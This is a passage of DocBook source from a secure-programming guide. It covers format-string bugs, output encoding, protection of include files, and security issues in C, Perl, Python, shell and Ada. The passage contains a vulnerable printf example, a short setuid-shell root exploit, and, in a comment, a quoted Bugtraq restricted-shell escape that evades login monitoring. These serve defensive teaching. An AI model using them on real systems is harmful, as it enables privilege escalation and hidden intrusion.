that is returned to the user.
The trouble is that these comments sometimes provide insight into how
the system works in a way that aids attackers.
</para>
</sect1>

<sect1 id="handle-full-output">
<title>Handle Full/Unresponsive Output</title>

<para>
It may be possible for a user to clog or make unresponsive a secure
program's output channel back to that user.
For example, a web browser could be intentionally halted or have its
TCP/IP channel response slowed.
The secure program should handle such cases, in particular it should release
locks quickly (preferably before replying) so that this will not create
an opportunity for a Denial-of-Service attack.
Always place time-outs on outgoing network-oriented write requests.
</para>

</sect1>

<sect1 id="control-formatting">
<title>Control Data Formatting (Format Strings/Formatation)</title>

<para>
A number of output routines in computer languages have a
parameter that controls the generated format.
In C, the most obvious example is the printf() family of routines
(including printf(), sprintf(), snprintf(), fprintf(), and so on).
Other examples in C include syslog() (which writes system log information)
and setproctitle() (which sets the string used to display
process identifier information).
Many functions with names beginning with ``err'' or ``warn'', containing
``log'' , or ending in ``printf'' are worth considering.
<!-- log() style functions calling v* in particular -->
<!-- Some info from 7/21/2000, Theo de Raadt on Bugtraq -->
<!-- OpenBSD docs for setproctitle() is at
     http://www.rocketaware.com/man/man3/setproctitle.3.htm -->
Python includes the "%" operation, which on strings controls formatting
in a similar manner.
Many programs and libraries define formatting functions, often by
calling built-in routines and doing additional processing
(e.g., glib's g_snprintf() routine).
</para>

<para>
Format languages are essentially little programming languages - so
developers who let attackers control the format string are essentially
running programs written by attackers!
Surprisingly, many people seem to forget the power of these formatting
capabilities, and use data from untrusted users as the formatting parameter.
The guideline here is clear -
never use unfiltered data from an untrusted user as the format parameter.
Failing to follow this guideline usually results in a
format string vulnerability (also called a formatation vulnerability).
Perhaps this is best shown by example:
<programlisting width="61">
  /* Wrong way: */
  printf(string_from_untrusted_user);
  /* Right ways: */
  printf("%s", string_from_untrusted_user); /* safe */
  fputs(string_from_untrusted_user); /* better for simple strings */
</programlisting>
</para>

<para>
If an attacker controls the formatting information,
an attacker can cause all sorts of mischief by carefully
selecting the format.
The case of C's printf() is a good example -
there are lots of ways to possibly exploit user-controlled format strings
in printf().
These include
buffer overruns by creating a long formatting string (this can
result in the attacker having complete control over the program),
conversion specifications that use unpassed parameters
(causing unexpected data to be inserted), and
creating formats which produce totally unanticipated result values
(say by prepending or appending awkward data,
causing problems in later use).
A particularly nasty case is printf's
%n conversion specification, which writes the
number of characters written so far into the pointer argument;
using this, an attacker can overwrite a value that was intended for printing!
An attacker can even overwrite almost arbitrary locations, since the attacker
can specify a ``parameter'' that wasn't actually passed.
The %n conversion specification has been standard part of C since its
beginning, is required by all C standards, and is used by real programs.
In 2000, Greg KH did a quick search of source code and identified the programs
BitchX (an irc client), Nedit (a program editor), and
SourceNavigator (a program editor / IDE / Debugger) as using %n, and there
are doubtless many more.
Deprecating %n would probably be a good idea, but even without %n there
can be significant problems.
<!--
Crispin Cowan posted the list at:
 http://lists.insecure.org/lists/vuln-dev/2000/Sep/0050.html
Immediately added forgotten credit at:
 http://lists.insecure.org/lists/vuln-dev/2000/Sep/0061.html
Greg KH mentions further:
 http://lists.insecure.org/lists/vuln-dev/2000/Sep/0053.html
 (He just searched some source code he had on hand).

-->
Many papers discuss these attacks in more detail, for example, you can see
<ulink url="http://www-syntim.inria.fr/fractales/Staff/Raynal/LinuxMag/SecProg/Art4/index.html">Avoiding security holes
when developing an application - Part 4: format strings</ulink>.
<!--
For a detailed description of how these format strings can be exploited,
see the following post on Bugtraq:
Subject: Howto exploit a remote format bug automatically
From: Fr<46>d<EFBFBD>ric Raynal frederic.raynal@inria.fr
Date: Thu, 18 Apr 2002 16:25:37 +0200
To: bugtraq@securityfocus.com

Also, see Fredrik Widlund (fredrik.widlund@defcom.com)'s "fox" program.
From the 19 April 2002 Bugtraq notice:
"fox", a tool I wrote for automatically exploiting any (or most) format bugs,
locally and remotely. Runs on OpenBSD and not ported to other platforms,
though it should be very straighforward.

The only requirement is that you get the actual printed string back to the
program, in the case of the OpenBSD 2.7 ftpd you need to proxy this through a
small shell program since the output occurs in the process listing.

Should work for exploiting bugs on most little-endian 32bit-machines like the
i386 providing you supply the shellcode.

Includes a trivial local example, and an example of how to point it at the
OpenBSD 2.7 ftpd and remotely get a root prompt instead of the ftp banner.


-->
</para>

<para>
Since in many cases the results are sent back to the user,
this attack can also be used to expose internal information about the stack.
This information can then be used to circumvent stack protection systems
such as StackGuard and ProPolice; StackGuard uses constant ``canary'' values
to detect attacks, but if the stack's contents can be displayed,
the current value of the canary will be exposed, suddenly making the
software vulnerable again to stack smashing attacks.
<!-- Fri, 21 Jul 2000 12:21:20 -0400,
     From:    Alan DeKok <aland@STRIKER.OTTAWA.ON.CA>
     Subject: StackGuard with ... Re: [Paper] Format bugs.
-->
</para>

<para>
A formatting string should almost always be a constant string,
possibly involving a function call to implement a
lookup for internationalization (e.g., via gettext's _()).
Note that this
lookup must be limited to values that the program controls, i.e., the
user must be allowed to only select from the message files controlled
by the program.
It's possible to filter user data before using it (e.g., by designing
a filter listing legal characters for the format string such as [A-Za-z0-9]),
but it's usually better to simply prevent the problem
by using a constant format string or fputs() instead.
Note that although I've listed this as an ``output'' problem, this can
cause problems internally to a program before output
(since the output routines may be saving to a file, or even just generating
internal state such as via snprintf()).
</para>

<para>
The problem of input formatting causing security problems
is not an idle possibility; see CERT Advisory CA-2000-13
for an example of an exploit using this weakness.
For more information on how these problems can be exploited, see
Pascal Bouchareine's email article titled ``[Paper] Format bugs'',
published in the July 18, 2000 edition of
<ulink url="http://www.securityfocus.com">Bugtraq</ulink>.
<!-- This paper can be hard to extract, but it's there -->
As of December 2000,
developmental versions of the gcc compiler support warning messages for
insecure format string usages, in an attempt to help developers avoid
these problems.
<!-- John Levon passed this information on to me; as of Dec 11, 2000, this
  was in the CVS version of gcc -->
</para>

<para>
Of course, this all begs the question as to whether or not the
internationalization lookup is, in fact, secure.
If you're creating your own internationalization lookup routines,
make sure that an untrusted user can only specify a legal locale and not
something else like an arbitrary path.
</para>

<para>
Clearly, you want to limit the strings created through internationalization
to ones you can trust.
Otherwise, an attacker could use this ability to exploit the
weaknesses in format strings, particularly in C/C++ programs.
This has been an item of discussion in Bugtraq (e.g., see
John Levon's Bugtraq post on July 26, 2000).
For more information, see the discussion on
permitting users to only select legal language values in
<xref linkend="locale-legal-values">.
</para>

<para>
Although it's really a programming bug, it's worth mentioning that
different countries notate numbers in different ways, in particular,
both the period (.) and comma (,) are used to separate an integer
from its fractional part.  If you save or load data, you need to make sure
that the active locale does not interfere with data handling.
Otherwise, a French user may not be able to exchange data with an
English user, because the data stored and retrieved will use
different separators.
I'm unaware of this being used as a security problem, but it's conceivable.
</para>

</sect1>

<sect1 id="output-character-encoding">
<title>Control Character Encoding in Output</title>

<para>
In general, a secure program must ensure that it synchronizes its
clients to any assumptions made by the secure program.
One issue often impacting web applications is that they forget to
specify the character encoding of their output.
This isn't a problem if all data is from trusted sources, but if
some of the data is from untrusted sources, the untrusted source may
sneak in data that uses a different encoding than the one expected
by the secure program.
This opens the door for a cross-site malicious content attack; see
<xref linkend="input-protection-cross-site"> for more information.
</para>

<para>
<ulink url="http://www.cert.org/tech_tips/malicious_code_mitigation.html">CERT's tech tip on malicious code mitigation</ulink> explains the problem
of unspecified character encoding fairly well, so I quote it here:

<blockquote>
<para>
Many web pages leave the character encoding
("charset" parameter in HTTP) undefined.
In earlier versions of HTML and HTTP, the character encoding
was supposed to default to ISO-8859-1 if it wasn't defined.
In fact, many browsers had a different default, so it was not possible
to rely on the default being ISO-8859-1.
HTML version 4 legitimizes this - if the character encoding isn't specified,
any character encoding can be used.
</para>

<para>
If the web server doesn't specify which character encoding is in use,
it can't tell which characters are special.
Web pages with unspecified character encoding work most of the time
because most character sets assign the same characters to byte values
below 128.
But which of the values above 128 are special?
Some 16-bit character-encoding schemes have additional
multi-byte representations for special characters such as "<".
Some browsers recognize this alternative encoding and act on it.
This is "correct" behavior, but it makes attacks using malicious scripts
much harder to prevent.
The server simply doesn't know which byte sequences
represent the special characters.
</para>

<para>
For example, UTF-7 provides alternative encoding for "&lt;" and "&gt;",
and several popular browsers recognize these as the start and end of a tag.
This is not a bug in those browsers.
If the character encoding really is UTF-7, then this is correct behavior.
The problem is that it is possible to get into a situation in which
the browser and the server disagree on the encoding.
</para>
</blockquote>
</para>

<para>
Thankfully, though explaining the issue is tricky, its resolution in HTML
is easy.
In the HTML header, simply specify the charset, like this example
from CERT:
<programlisting>
&lt;HTML&gt;
&lt;HEAD&gt;
&lt;META http-equiv=&quot;Content-Type&quot;
content=&quot;text/html; charset=ISO-8859-1&quot;&gt;
&lt;TITLE&gt;HTML SAMPLE&lt;/TITLE&gt;
&lt;/HEAD&gt;
&lt;BODY&gt;
&lt;P&gt;This is a sample HTML page
&lt;/BODY&gt;
&lt;/HTML&gt;
</programlisting>

</para>

<para>
From a technical standpoint,
an even better approach is to set the character encoding as part of
the HTTP protocol output, though some libraries make this more difficult.
This is technically better because it doesn't force the client to
examine the header to determine a character encoding that would enable it
to read the META information in the header.
Of course, in practice a browser that couldn't read the META information
given above and use it correctly would not succeed in the marketplace,
but that's a different issue.
In any case, this just means that the server would need to send
as part of the HTTP protocol, a ``charset'' with the desired value.
Unfortunately, it's hard to heartily recommend this (technically better)
approach, because some older HTTP/1.0 clients did not deal properly with
an explicit charset parameter.
<!-- This is documented in the HTTP 1.1 specification -->
Although the HTTP/1.1 specification requires clients to obey the parameter,
it's suspicious enough that you probably ought to use it as an
adjunct to forcing the use of the correct
character encoding, and not your sole mechanism.
</para>

</sect1>

<sect1 id="prevent-include-access">
<title>Prevent Include/Configuration File Access</title>
<!-- I was reminded of this by the Bugtraq posting of 1 Dec 2000
by Mads Bach (bach@INDER.NET), "Subject: Web based apps and include files" -->

<para>
When developing web based applications,
do not allow users to access (read) files such as the program include and
configuration files.
This data may provide enough information (e.g., passwords) to break into
the system.
Note that this guideline sometimes also applies to other kinds of applications.
There are several actions you can take to do this, including:
<itemizedlist>
<listitem><para>Place
the include/configuration files outside of the web documentation
root (so that the web server will never serve the files).
Really, this is the best approach unless there's some reason the
files have to be inside the document root.</para></listitem>
<listitem><para>Configure the web server so it will not serve include files as
text.  For example, if you're using Apache,
you can add a handler or an action for .inc files like so:
<programlisting width="61">
<![CDATA[
 <Files *.inc>
   Order allow,deny
   Deny from all
 </Files>
]]>
</programlisting>
</para></listitem>
<listitem><para>Place the include files
in a protected directory (using .htaccess), and designate them as files
that won't be served.
<!-- Suggested by Dustin Rue in Bugtraq 1 Dec 2000 to 4 Dec 2000 -->
</para></listitem>
<listitem><para>Use a filter to deny access to the files.
For Apache, this can be done using:
<programlisting width="61">
<![CDATA[
 <Files ~ "\.phpincludes">
    Order allow,deny
    Deny from all
 </Files>
]]>
</programlisting>
If you need full regular expressions to match filenames, in Apache you
could use the FilesMatch directive.
<!-- Suggested by Julien Savoie and James Lyon
     in Bugtraq 1 Dec 2000 to 4 Dec 2000 -->
</para></listitem>
<listitem><para>If your include file is a valid script file,
which your server will parse,
make sure that it doesn't act on user-supplied parameters and that it's
designed to be secure.</para></listitem>
</itemizedlist>
</para>

<para>
These approaches won't protect you from users who
have access to the directories your files are in if they are world-readable.
You could change the permissions of the files so
that only the uid/gid of the webserver can read these files.
However, this approach won't work if the user can get the web server to
run his own scripts (the user can just write scripts to access your files).
Fundamentally, if your site is being hosted on a server shared with
untrusted people, it's harder to secure the system.
One approach is to run multiple web serving programs, each with different
permissions; this provides more security but is painful in practice.
Another approach is to set these files to be read only by your uid/gid,
and have the server run scripts at ``your'' permission.
This latter approach has its own problems: it means that certain parts of
the server must have root privileges, and that the script may
have more permissions than necessary.
</para>
</sect1>


</chapter>

<chapter id="language-specific">
<title>Language-Specific Issues</title>
<epigraph>
<attribution>1 Corinthians 14:10 (NIV)</attribution>
<para>
Undoubtedly there are all sorts of languages in the world,
yet none of them is without meaning.
</para>
</epigraph>

<para>
There are many language-specific security issues.
Many of them can be summarized as follows:
<itemizedlist>
<listitem><para>
Turn on all relevant warnings and protection mechanisms available to you
where practical.
For compiled languages, this includes
both compile-time mechanisms and run-time mechanisms.
In general, security-relevant programs should compile cleanly with
all warnings turned on.
</para></listitem>

<listitem><para>
If you can use a ``safe mode'' (e.g., a mode that limits the activities
of the executable), do so.
Many interpreted languages include such a mode.
In general, don't depend on the safe mode to provide absolute protection;
most language's safe modes have not been sufficiently analyzed for their
security, and when they are, people usually discover many ways to exploit it.
However, by writing your code so that it's secure out of safe mode, and
then adding the safe mode, you end up with defense-in-depth (since in
many cases, an attacker has to break both
your application code and the safe mode).
</para></listitem>

<listitem><para>
Avoid dangerous and deprecated operations in the language.
By ``dangerous'', I mean operations which are difficult to use correctly.
For example, many languages include
some mechanisms or functions that are ``magical'', that
is, they try to infer the ``right'' thing to do using a heuristic -
generally you should avoid them, because an attacker may be able to
exploit the heuristic and do something dangerous instead of what was intended.
A common error is an ``off-by-one'' error, in which the bound is
off by one, and sometimes these result in exploitable errors.
In general, write code in a way that minimizes the likelihood of
off-by-one errors.
If there are standard conventions in the language (e.g., for writing loops),
use them.
</para></listitem>

<listitem><para>
Ensure that the languages'
infrastructure (e.g., run-time library) is available and secured.
</para></listitem>

<listitem><para>
Languages that automatically garbage-collect strings should be
especially careful to immediately erase secret data
(in particular secret keys and passwords).
</para></listitem>

<listitem><para>
Know precisely the semantics of the operations that you are using.
Look up each operation's semantics in its documentation.
Do not ignore return values unless you're sure they cannot be relevant.
Don't ignore the difference between ``signed'' and ``unsigned'' values.
This is particularly difficult in languages which don't support exceptions,
like C, but that's the way it goes.
</para></listitem>
</itemizedlist>
</para>

<sect1 id="c-cpp">
<title>C/C++</title>

<para>
It is possible to develop secure code using C or C++, but both
languages include fundamental design decisions that make it
more difficult to write secure code.
C and C++ easily permit buffer overflows, force programmers to do their
own memory management, and are fairly lax in their typing systems.
For systems programs (such as an operating system kernel),
C and C++ are fine choices.
For applications, C and C++ are often over-used.
Strongly consider using an even higher-level language,
at least for the majority of the application.
But clearly, there are many existing programs in C and C++
which won't get completely rewritten, and many developers may choose
to develop in C and C++.
</para>

<para>
One of the biggest security problems with C and C++ programs is
buffer overflow; see <xref linkend="buffer-overflow">
for more information.
C has the additional weakness of not supporting exceptions, which makes
it easy to write programs that ignore critical error situations.
</para>

<para>
Another problem with C and C++ is that developers have to do their
own memory management (e.g., using malloc(), alloc(), free(), new, and delete),
and failing to do it correctly may result in a security flaw.
The more serious problem is that programs may erroneously
free memory that should not be freed (e.g., because it's already been freed).
This can result in an immediate crash or be exploitable, allowing
an attacker to cause arbitrary code to be executed; see
[Anonymous Phrack 2001].
Some systems (such as many GNU/Linux systems) don't protect
against double-freeing at all by default, and it is not clear that those
systems which attempt to protect themselves are truly unsubvertable.
Although I haven't seen anything written on the subject, I suspect that
using the incorrect call in C++ (e.g., mixing new and malloc()) could
have similar effects.
For example, on March 11, 2002, it was announced that the zlib
library had this problem, affecting the many programs that use it.
<!-- http://www.linuxsecurity.com/articles/security_sources_article-4582.html -->
Thus, when testing programs on GNU/Linux,
you should set the environment variable
MALLOC_CHECK_ to 1 or 2, and you might consider executing your program
with that environment variable set with 0, 1, 2.
The reason for this variable is explained in GNU/Linux malloc(3) man page:
<blockquote>
<para>
Recent versions of Linux libc (later than 5.4.23) and
GNU libc (2.x) include a malloc implementation which is tunable
via environment variables.
When MALLOC_CHECK_ is set, a special (less efficient) implementation
is used which is designed to be tolerant against simple errors,
such as double calls of free() with the same argument,
or overruns of a single byte (off-by-one bugs).
Not all such errors can be protected against, however, and memory leaks
can result.
If MALLOC_CHECK_ is set to 0, any detected heap corruption
is silently ignored;
if set to 1, a diagnostic is printed on stderr;
if set to 2, abort() is called immediately.
This can be useful because otherwise a crash may happen much later,
and the true cause for the problem is then very hard to track down.
</para>
</blockquote>
There are various tools to deal with this, such as
Electric Fence and Valgrind;
see <xref linkend="tools"> for more information.
If unused memory is not free'd, (e.g., using free()), that unused memory
may accumulate - and if enough unused memory can accumulate, the
program may stop working.
As a result, the unused memory may be exploitable by attackers to
create a denial of service.
It's theoretically possible for attackers to cause memory to be
fragmented and cause a denial of service, but usually this
is a fairly impractical and low-risk attack.
</para>

<para>
Be as strict as you reasonably can when you declare types.
Where you can, use ``enum'' to define enumerated values (and not
just a ``char'' or ``int'' with special values).
This is particularly useful for values in switch statements, where
the compiler can be used to determine if all legal values have been covered.
Where it's appropriate, use ``unsigned'' types if the value can't be
negative.
</para>

<para>
<!-- The example is from Sebastian (Bugtraq, 26 June 2000) -->
One complication in C and C++ is that the character type ``char'' can be
signed or unsigned (depending on the compiler and machine).
When a signed char with its high bit set
is saved in an integer, the result will be a negative number;
in some cases this can be exploitable.
In general, use ``unsigned char'' instead of char or signed char for
buffers, pointers, and casts when
dealing with character data that may have values greater than 127 (0x7f).
</para>

<para>
C and C++ are by definition rather lax in their type-checking support, but
you can at least increase their level of checking so that some mistakes
can be detected automatically.
Turn on as many compiler warnings as you can and change the code to cleanly
compile with them, and strictly use ANSI prototypes in separate header
(.h) files to ensure that all function calls use the correct types.
For C or C++ compilations using gcc, use at least
the following as compilation flags (which turn on a host of warning messages)
and try to eliminate all warnings (note that -O2 is used since some
warnings can only be detected by the data flow analysis performed at
higher optimization levels):
<screen width="61">
gcc -Wall -Wpointer-arith -Wstrict-prototypes -O2
</screen>
You might want ``-W -pedantic'' too.
</para>

<para>
Many C/C++ compilers can detect inaccurate format strings.
For example,
gcc can warn about inaccurate format strings for functions you create
if you use its __attribute__() facility (a C extension) to mark such functions,
and you can use that facility without making your code non-portable.
Here is an example of what you'd put in your header (.h) file:
<programlisting width="61">
 /* in header.h */
 #ifndef __GNUC__
 #  define __attribute__(x) /*nothing*/
 #endif

 extern void logprintf(const char *format, ...)
    __attribute__((format(printf,1,2)));
 extern void logprintva(const char *format, va_list args)
    __attribute__((format(printf,1,0)));
</programlisting>
The "format" attribute takes either "printf" or "scanf", and the numbers
that follow are the parameter number of the format string and the first
variadic parameter (respectively). The GNU docs talk about this well.
Note that there are other __attribute__ facilities as well,
such as "noreturn" and "const".
<!-- The __attribute__ discussion
     Derived from "Stephen J. Friedl", Sat, 22 Jul 2000 16:21:08 -0700,
     Bugtraq -->
</para>

<para>
Avoid common errors made by C/C++ developers.
For example, be careful about not using ``='' when you mean ``==''.
</para>


</sect1>

<sect1 id="perl">
<title>Perl</title>
<para>
Perl programmers should first read the man page perlsec(1),
which describes a number of issues involved with writing secure programs
in Perl.
In particular, perlsec(1) describes the ``taint'' mode, which most
secure Perl programs should use.
Taint mode is automatically enabled if the real and effective user or group
IDs differ, or you can use the -T command line flag
(use the latter if you're running on behalf of someone else, e.g.,
a CGI script).
Taint mode turns on various checks, such as checking
path directories to make sure they aren't writable by others.
</para>

<para>
The most obvious affect of taint mode, however, is that
you may not use data derived from outside your program to
affect something else outside your program by accident.
In taint mode,
all externally-obtained input is marked as ``tainted'', including
command line arguments, environment variables,
locale information (see perllocale(1)),
results of certain system calls (readdir, readlink,
the gecos field of getpw* calls), and all file input.
Tainted data may not be
used directly or indirectly in any command that invokes a
sub-shell, nor in any command that modifies files,
directories, or processes.
There is one important exception: If you
pass a list of arguments to either system or exec, the
elements of that list are NOT checked for taintedness, so
be especially careful with system or exec while in taint mode.
</para>

<para>
Any data value derived from tainted data becomes tainted also.
There is one exception to this; the way to untaint data is to
extract a substring of the tainted data.
Don't just use ``.*'' blindly as your substring, though, since this
would defeat the tainting mechanism's protections.
Instead, identify patterns that identify the ``safe'' pattern
allowed by your program, and use them to extract ``good'' values.
After extracting the value, you may still need to check it
(in particular for its length).
</para>

<para>
The open, glob, and backtick functions
call the shell to expand filename wild card characters; this
can be used to open security holes.
You can try to avoid these functions entirely, or use them in a
less-privileged ``sandbox'' as described in perlsec(1).
In particular, backticks should be rewritten using the system() call
(or even better, changed entirely to something safer).
</para>

<para>
The perl open() function comes with, frankly,
``way too much magic'' for most secure programs; it interprets text
that, if not carefully filtered, can create lots of security problems.
Before writing code to open or lock a file, consult the perlopentut(1)
man page.
In most cases, sysopen() provides a safer (though more convoluted)
approach to opening a file.
<ulink
url="http://www.xray.mpe.mpg.de/mailing-lists/perl5-porters/2000-03/msg02596.html">
The new Perl 5.6 adds an open() call
with 3 parameters to turn off the magic behavior
without requiring the convolutions of sysopen()</ulink>.
</para>

<para>
Perl programs should turn on the warning flag (-w), which warns of
potentially dangerous or obsolete statements.
</para>

<para>
You can also run Perl programs in a restricted environment.
For more information see the ``Safe'' module in the standard Perl
distribution.
I'm uncertain of the amount of auditing that this has undergone,
so beware of depending on this for security.
You might also investigate the ``Penguin Model for
Secure Distributed Internet Scripting'', though at the time
of this writing the code and documentation seems to be unavailable.
<!-- Search for Penguin FAQ, the Penguin Model for Secure Distributed
  Internet Scripting -->
</para>

<para>
Many installations include a setuid root version of perl named ``suidperl''.
However, the perldelta man page version 5.6.1 recommends using sudo
instead, stating the following:
<blockquote>
<para>
"Note that suidperl is neither built nor installed by default in
any recent version of perl.
Use of suidperl is highly discouraged.
If you think you need it, try alternatives such as sudo first.
See http://www.courtesan.com/sudo/".
</para>
</blockquote>
</para>

</sect1>

<sect1 id="python">
<title>Python</title>
<para>
As with any language,
beware of any functions which allow data to be executed as parts of
a program, to make sure an untrusted user can't affect their input.
This includes exec(), eval(), and execfile()
(and frankly, you should check carefully any call to compile()).
The input() statement is also surprisingly dangerous.
[Watters 1996, 150].
</para>

<para>
Python programs with privileges that can be invoked by unprivileged users
(e.g., setuid/setgid programs)
must <emphasis>not</emphasis> import the ``user'' module.
The user module causes the pythonrc.py file to be read and executed.
Since this file would be under the control of an untrusted user,
importing the user module allows an attacker to force the trusted
program to run arbitrary code.
</para>

<para>
Python does very little compile-time checking -- it has essentially
no compile-time type information, and it doesn't even check that the
number of parameters passed are legal for a given function or method.
This is unfortunate, resulting in a lot of latent bugs
(both John Viega and I have experienced this problem).
Hopefully someday Python will implement optional static typing and
type-checking, an idea that's been discussed for some time.
A partial solution for now is PyChecker, a lint-like program that
checks for common bugs in Python source code.
You can get PyChecker from
<ulink url="http://pychecker.sourceforge.net">http://pychecker.sourceforge.net</ulink>
</para>

<para>
Python includes support for ``Restricted Execution'' through
its RExec class.
This is primarily intended for executing applets and mobile code, but
it can also be used to limit privilege in a program even when the
code has not been provided externally.
By default, a restricted execution
environment permits reading (but not writing) of files,
and does not include operations for network access or GUI interaction.
These defaults can be changed, but beware of creating loopholes in
the restricted environment.
In particular, allowing a user to unrestrictedly add attributes to a
class permits all sorts of ways to subvert the environment
because Python's implementation calls many ``hidden'' methods.
Note that, by default, most Python objects are passed by reference; if you
insert a reference to a mutable value into a restricted program's environment,
the restricted program can change the object in a way that's visible
outside the restricted environment!
Thus, if you want to give access to a mutable value, in many cases
you should copy the mutable value or use the Bastion module (which supports
restricted access to another object).
For more information, see
Kuchling [2000].
I'm uncertain of the amount of auditing that the restricted
execution capability has undergone, so programmer beware.
</para>

</sect1>

<sect1 id="shell">
<title>Shell Scripting Languages (sh and csh Derivatives)</title>
<para>
I strongly recommend against using
standard command shell scripting languages (such as csh, sh, and bash)
for setuid/setgid secure code.
Some systems (such as Linux) completely disable setuid/setgid
shell scripts, so creating setuid/setgid shell scripts creates
an unnecessary portability problem.
On some old systems they are fundamentally insecure due to a race condition
(as discussed in <xref linkend="process-creation">).
Even for other systems, they're not really a good idea.
</para>

<para>
In fact, there are a vast number of circumstances where shell scripting
languages shouldn't be used at all for secure programs.
Standard command shells are notorious for being affected by nonobvious inputs -
generally because command shells were designed to try to do
things ``automatically'' for an interactive user, not to defend against
a determined attacker.
Shell programs are fine for programs that don't need to be secure
(e.g., they run at the same privilege as the unprivileged
user and don't accept ``untrusted'' data).
They can also be useful when they're running with privilege, as long as
all the input (e.g., files, directories, command line, environment, etc.)
are all from trusted users - which is why they're
often used quite successfully in startup/shutdown scripts.
</para>

<para>
Writing secure shell programs in the presence of malicious
input is harder than in many other languages because
of all the things that shells are affected by.
For example,
``hidden'' environment variables (e.g., the ENV, BASH_ENV, and IFS values)
can affect how they operate or even execute arbitrary user-defined
code before the script can even execute.
Even things like filenames of the executable or directory contents can
affect execution.
If an attacker can create filenames containing
some control characters (e.g., newline),
or whitespace, or shell metacharacters, or begin with a dash
(the option flag syntax), there are often ways to exploit them.
For example, on many Bourne shell implementations, doing the following
will grant root access (thanks to NCSA for describing this
exploit):
<!-- http://www.ncsa.uiuc.edu/General/Grid/ACES/security/programming/#setuid-sh-exploit -->
<programlisting width="61">
 % ln -s /usr/bin/setuid-shell /tmp/-x
 % cd /tmp
 % -x
</programlisting>
Some systems may have closed this hole, but the point still stands:
most command shells aren't intended for writing secure setuid/setgid programs.
For programming purposes, avoid creating setuid shell scripts, even
on those systems that permit them.
Instead, write a small program in another language to clean up the
environment, then have it call other executables (some of which
might be shell scripts).
</para>

<para>
If you still insist on using shell scripting languages, at least
put the script in a directory where it cannot be moved or changed.
Set PATH and IFS to known values very early in your script; indeed, the
environment should be cleaned before the script is called.
Also, very early on, ``cd'' to a safe directory.
Use data only from directories that is controlled by trusted users, e.g., /etc,
so that attackers can't insert maliciously-named files into those directories.
Be sure to quote every filename passed on a command line, e.g., use
"$1" not $1, because filenames with whitespace will be split.
Call commands using "--" to disable additional options where you can,
because attackers may create or pass filenames beginning with dash in the
hope of tricking the program into processing it as an option.
Be especially careful of filenames embedding other characters
(e.g., newlines and other control characters).
Examine input filenames especially carefully and be very restrictive
on what filenames are permitted.
</para>

<para>
If you don't mind limiting your program to only work with GNU tools
(or if you detect and optionally use the GNU tools instead when
they are available), you might want
to use NIL characters as the filename terminator instead of newlines.
By using NIL characters, rather than whitespace or newlines,
handling nasty filenames (e.g., those with
embedded newlines) is much simpler.
Several GNU tools that output or input filenames can use this format
instead of the more common ``one filename per line'' format.
Unfortunately, the name of this option isn't consistent between tools;
for many tools the name of this option is ``--null'' or ``-0''.
GNU programs xargs and cpio allow using either --null or -0,
tar uses --null,
find uses -print0,
grep uses either --null or -Z, and
sort uses either -z or --zero-terminated.
Those who find this inconsistency particularly disturbing are invited
to supply patches to the GNU authors;
I would suggest making sure every program supported ``--null'' since that
seems to be the most common option name.
For example, here's one way to move files to a target directory, even
if there may be a vast number of files and some may have awkward names
with embedded newlines
(thanks to Jim Dennis for reminding me of this):
<programlisting>
 find . -print0 | xargs --null mv --target-dir=$TARG
</programlisting>
<!--
Noted briefly in:
http://www.linuxjournal.com//article.php?sid=6060
-->
</para>

<para>
In a similar vein, I recommend <emphasis>not</emphasis> trusting
``restricted shells'' to implement secure policies.
Restricted shells are shells that intentionally prevent users from
performing a large set of activities - their goal is to force users
to only run a small set of programs.
A restricted shell can be useful as a defense-in-depth measure, but
restricted shells are notoriously hard to configure correctly and as
configured are often subvertable.
For example, some restricted shells will start by running some file
in an unrestricted mode (e.g., ``.profile'') - if a user can change this
file, they can force execution of that code.
A restricted shell should be set up to only run a few programs, but
if any of those programs have ``shell escapes'' to let users run more
programs, attackers can use those shell escapes to escape the
restricted shell.
Even if the programs don't have shell escapes, it's quite likely that
the various programs can be used together (along with the shell's capabilities)
to escape the restrictions.
Of course, if you don't set the PATH of a restricted shell (and allow
any program to run), then an attacker can use the shell escapes of
many programs (including text editors, mailers, etc.).
The problem is that the purpose of a shell is to run other programs,
but those other programs may allow unintended operations -- and the
shell doesn't interpose itself to prevent these operations.
</para>

<!--

(From Bugtraq)

Subject: Restricted Shells
From: A.Dimitrov <adimitro@bobcat.gcsu.edu>
Date: 18 Apr 2002 21:12:23 -0000
To: bugtraq@securityfocus.com

I have recently realized a security issue in some
of the restricted shells on *NIX systems. I am not
sure if I am the first one to discover the problem
I am going to discuss but I am sure that it has
not been posted yet, atleast not that I know of.

Basically this is the issue:

Affected Systems:
=================
Any Unix systems that I am aware of using
restricted shells (rbash, rksh)

Description:
============
An authorized user is that is set to use rbash or
rksh is able to escape the restricted shell
environment and then furthermore exploit the
system. The problem comes from the fact thatwhen a
command is executed from the shell and it is found
to be a shell procedure then rksh or rbash are
invoked to  execute it.

Proof:
======

One needs to store the shell script in a
world-writable directory like /tmp or /usr/tmp
so let's assume the server is running sshd (This
is also exploitable through rsh). In this case
store in a file called anything you want (I will
use .tmp123) the following:

===

/usr/bin/bash
rm -Rf /tmp/.tmp123

===


Then execute the following:

$scp ./.tmp123 user@host:/tmp  user@host's password:

Done.

$ssh -l user host '/tmp/.tmp123'
user@host's password:
_


You should now have a normal bash shell instead
of the original rbash.
Also a great plus to doing this is that whenever
you follow the procedure above the commands 'w'
and 'who' cannot detect your presence. However
'ps' dows show the intruder's presence.

Fix:
====
I am not aware of any except maybe an attempt to
retune the system. If anyone has any ideas please
e-mail me.

A. Dimitrov
System Administrator
Georgia College & State University


A reply in 18 April 2002 Bugtraq said:
Subject: Re: Restricted Shells
From: "Scott T. Cameron" <karn@routehero.com>
Date: Thu, 18 Apr 2002 17:58:13 -0700
To: bugtraq@securityfocus.org

[snip]

With sshd2, you should be able use 'ChrootGroups' or 'ChrootUsers' to fix this problem.  Please see sshd2_config(5).


(but of course, this still shows that restricted shells are hard to
use correctly).

-->
</sect1>

<sect1 id="ada">
<title>Ada</title>
<para>
In Ada95, the Unbounded_String type is often more flexible than the
String type because it is automatically resized as necessary.
However, don't store especially sensitive secret values such as passwords
or secret keys in an Unbounded_String, since core dumps and page areas
might still hold them later.
Instead, use the String type for this data, lock it into memory
while it's used, and overwrite the data as
soon as possible with some constant value such as (others => ' ').
Use the Ada pragma Inspection_Point on the object holding the secret
after erasing the memory.
That way, you can be certain that
the object containing the secret will really be erased
(and that the overwriting won't be optimized away).
</para>

<para>
It's common for beginning Ada programmers to believe that the
String type's first index value is always 1, but this isn't true if
the string is sliced.
Avoid this error.
</para>

<para>
It's worth noting that SPARK is
a ``high-integrity subset of the Ada programming language'';
